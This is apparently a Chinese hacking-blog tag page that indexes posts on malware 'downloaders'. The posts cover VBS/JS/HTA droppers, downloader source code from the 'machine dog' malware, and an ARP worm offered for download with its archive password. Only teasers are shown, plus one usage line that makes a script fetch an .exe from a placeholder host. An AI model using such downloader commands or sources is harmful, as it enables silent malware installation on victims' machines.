标签 ‘下载者’ 下的日志

做一个困难重重的hta下载者

作者:lcx

一、先说本blog上有两个比较新颖的vbs下载者,一个是利用CDO.Message组件做的,参见http://hi.baidu.com/myvbscript/blog/item/b64592267c8e4c118b82a102.html;另一个是用Microsoft.XMLDOM做的,参见http://hi.baidu.com/myvbscript/blog/item/b64592267c8e4c118b82a102.html。这两个下载者一个是利用起来比较麻烦,需要事先把exe进行转化。第二使用中cscript.exe会访问网络,不太隐蔽。第二个是有的机器上并不存在这两个组件及利用到ADODB.Stream的,所以有些弊端。
阅读全文 »

Tags: ,

XMLDOM下载者生成器(xmldown.hta)

作者:lcx

以下代码保存成hta文件,可生成js和vbs下载者
阅读全文 »

Tags: ,

利用CDO.Message做的vbs下载者

作者:lcx

vbs下载者有很多了,我这里是一个伟大的发明,利用CDO.Message做的vbs下载者。伟大是装B的意思。

NP先把代码写完了,详情看这里:http://hi.baidu.com/vbs_zone/blog/item/f254871382e6d0045aaf5358.html

由于NP写的不知什么原因,在我机器上执行后生成的exe,进程不会自动退出,我重新更新一下。
阅读全文 »

Tags: , ,

js下载者

作者:lcx
来源:vbs小铺

//将常用的vbs下载者改成js版了。本来想用jsc.exe编译,可是不成功。jsc.exe不认WScript

//use: cscript this.js http://www.xxx.com/xxx.exe c:\xxx.exe

阅读全文 »

Tags: ,

Hook URLDownloadToFileA(查看下载者)

鬼仔注:这几天陪老爸去了外地一趟,所以一直没更新,抱歉。

作者:Open

驱动不会写!
程序是枚举所有进程注入DLL 挂钩URLDownloadToFileA函数!
by:Open

下载地址:23_152422_hookapi.rar

Tags:

机器狗写入到userinit.exe文件的下载者源码

文章作者:naitm
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
文章备注:从IDA中复制,稍作修改所得。
ASM
阅读全文 »

Tags: , ,

三种语言的下载者源代码:C Delphi Vb

原始出处:http://www.antcodes.cn/post/17.html

C
阅读全文 »

Tags: , , ,

黑色技术蠕虫下载者[完整源码]

文章作者:教主
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
作者网站:黑色技术 www.Rootkit.com.cn

——————————————————–
公开源码用于编程交流。利用此代码修改或传播与作者无任何关系。
代码环境:Vc++
需要Winpcap 支持
解压缩密码:fengzi

—————淫荡的分割线———————–

此份代码很乱,没有太大的技术含量,高手可以飘过。。。。
——————————————————–

下载地址:ArpWorm.rar

Tags: , ,